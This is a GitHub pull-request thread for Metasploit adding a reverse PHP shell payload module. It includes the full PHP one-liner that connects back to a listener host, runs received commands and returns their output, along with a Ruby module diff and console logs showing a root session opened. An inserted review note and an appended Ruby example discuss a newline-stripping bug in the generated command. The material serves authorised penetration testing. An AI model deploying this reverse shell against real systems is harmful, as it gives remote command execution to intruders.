
Add a reverse php shell without ssl #18335

Closed
wants to merge 4 commits into from

Conversation

jvoisin
Contributor

@jvoisin jvoisin commented Sep 1, 2023

No description provided.

@jvoisin
Contributor Author

jvoisin commented Sep 1, 2023

I copy-pasted most of the code from the reverse_php_ssl.rb one, do we want to please msftidy, or keep all the reverse shells similar?

@github-actions

github-actions bot commented Sep 5, 2023

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@bwatters-r7
Contributor

I copy-pasted most of the code from the reverse_php_ssl.rb one, do we want to please msftidy, or keep all the reverse shells similar?

Most of the rubocop complaints are about white space; I don't see any issue correcting those. The last line being an implicit return and assignment to an unused variable works in ruby, but it still hurts my soul a little.

@jvoisin
Contributor Author

jvoisin commented Sep 7, 2023

The last line being an implicit return and assignment to an unused variable works in ruby, but it still hurts my soul a little.

What would be the right™ way to do it, and put balm on your soul?

@jvoisin jvoisin closed this by deleting the head repository Sep 23, 2023
@adfoster-r7
Contributor

@jvoisin Sorry for the delay on this, we've been pretty swamped on our side! 👍

Generating payload working:

msf6 payload(cmd/unix/reverse_php) > to_handler lhost=192.168.1.178

[+] php -r 'while ($s=@fsockopen("192.168.1.178:4444") {
  while ($l=fgets($s)) {
    exec($l, $o);
    $o=implode("
",$o) . "
";
    fputs($s,$o);
  }
}"
'&

Using the payload gives an error:

Parse error: syntax error, unexpected 'while' (T_WHILE) in Command line code on line 2

I made a small change to remove the newlines/whitespace, and fixed the syntax errors in the php payload, as well as a rubocop linting error:

diff --git a/modules/payloads/singles/cmd/unix/reverse_php.rb b/modules/payloads/singles/cmd/unix/reverse_php.rb
index a04c024733..ce1f636a5b 100644
--- a/modules/payloads/singles/cmd/unix/reverse_php.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_php.rb
@@ -48,14 +48,14 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    cmd = <<~PHP
-      while ($s=@fsockopen("#{datastore['LHOST']}:#{datastore['LPORT']}") {
+    cmd = <<~PHP.lines.map(&:strip).join
+      while ($s=@fsockopen("#{datastore['LHOST']}:#{datastore['LPORT']}")) {
         while ($l=fgets($s)) {
           exec($l, $o);
           $o=implode("\n",$o) . "\n";
           fputs($s,$o);
         }
-      }"
+      }
     PHP
     "#{datastore['PHPPath']} -r '#{cmd}'&"
   end
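Review bot: the `.lines.map(&:strip).join` added on the `cmd = <<~PHP` line also strips the `\n` escapes inside the PHP string literals on the `implode` line, because an interpolating squiggly heredoc turns `"\n"` into a real newline before `lines` splits the text; the generated command further down shows the effect (`implode("",$o) . ""`), so the lines of each command's output are sent back concatenated with no separator. Writing them as `"\\n"` in the heredoc keeps a literal backslash-n in the one-liner, which PHP then interprets as a newline; a non-interpolating `<<~'PHP'` would also work but would break the `#{datastore[...]}` interpolation.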

Generating:

msf6 payload(cmd/unix/reverse_php) > generate lhost=192.168.1.178 -f raw verbose=false

[+] php -r 'while ($s=@fsockopen("192.168.1.178:4444") {while ($l=fgets($s)) {exec($l, $o);$o=implode("",$o) . "";fputs($s,$o);}}"'&

handler:

msf6 payload(cmd/unix/reverse_php) > to_handler lhost=192.168.1.178

[+] php -r 'while ($s=@fsockopen("192.168.1.178:4444")) {while ($l=fgets($s)) {exec($l, $o);$o=implode("",$o) . "";fputs($s,$o);}}'&
[*] Payload Handler Started as Job 0

[*] Started reverse TCP handler on 192.168.1.178:4444 

Executing:

msf6 payload(cmd/unix/reverse_php) > [*] Command shell session 1 opened (192.168.1.178:4444 -> 192.168.1.178:53921) at 2023-09-29 13:14:22 +0100
sessions -i -1 -c whoami
[*] Running 'whoami' on shell session -1 (192.168.1.178)
root

Looks like this would be good to go after those tweaks 🤞
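As an added example (not code from the PR or from Metasploit), the Ruby below reproduces the strip-and-join step from the revised module on just the `implode` line, and shows that the interpolating `<<~PHP` heredoc turns `\n` into a real newline before `lines` runs, so the separator is lost unless it is written as `\\n`. The `collapse`, `naive_fragment`, `escaped_fragment` and `separator_intact?` names are this example's own.

```ruby
# Added example: reproduces the newline-stripping side effect seen in the
# generated payload (`implode("",$o) . ""`), not the module's own code.

# Same collapsing step as the revised command_string: split into lines,
# strip each one, and concatenate into a single line for `php -r`.
def collapse(template)
  template.lines.map(&:strip).join
end

# Interpolating squiggly heredoc: Ruby converts "\n" into a real newline
# character before `lines` splits the text, so the separator inside the
# PHP string literals disappears together with the layout newlines.
def naive_fragment
  collapse(<<~PHP)
    $o=implode("\n",$o) . "\n";
    fputs($s,$o);
  PHP
end

# Escaping the backslash keeps a literal backslash-n in the Ruby string;
# `lines` only splits on real newlines, and PHP later interprets "\n"
# inside its double-quoted literal as a newline at run time.
def escaped_fragment
  collapse(<<~PHP)
    $o=implode("\\n",$o) . "\\n";
    fputs($s,$o);
  PHP
end

# Check a module author can run before shipping: the collapsed one-liner
# must still carry the escaped separator for PHP to see it.
def separator_intact?(php)
  php.include?('"\n"')
end

if __FILE__ == $PROGRAM_NAME
  puts naive_fragment    # prints: $o=implode("",$o) . "";fputs($s,$o);
  puts escaped_fragment  # prints: $o=implode("\n",$o) . "\n";fputs($s,$o);
end
```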
